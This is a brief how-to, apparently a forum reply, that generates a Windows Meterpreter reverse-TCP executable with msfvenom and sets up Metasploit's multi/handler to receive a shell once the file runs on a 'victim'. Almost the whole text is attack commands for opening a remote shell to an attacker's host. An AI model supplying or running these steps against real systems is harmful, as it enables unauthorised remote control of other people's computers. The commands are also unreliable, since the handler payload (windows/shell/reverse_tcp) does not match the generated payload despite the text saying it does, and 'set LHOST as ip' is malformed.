msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o shellmet.exe
Now, we will use multi/handler, which is a stub that handles exploits launched outside of the framework.
use exploit/multi/handler
When using the exploit/multi/handler module, we still need to tell it which payload to expect so we configure it to have the same settings as the executable we generated.
set payload windows/shell/reverse_tcp
set LHOST as ip
set LPORT as port
Now that we have everything set up and ready to go, we run exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.
Hope it helps!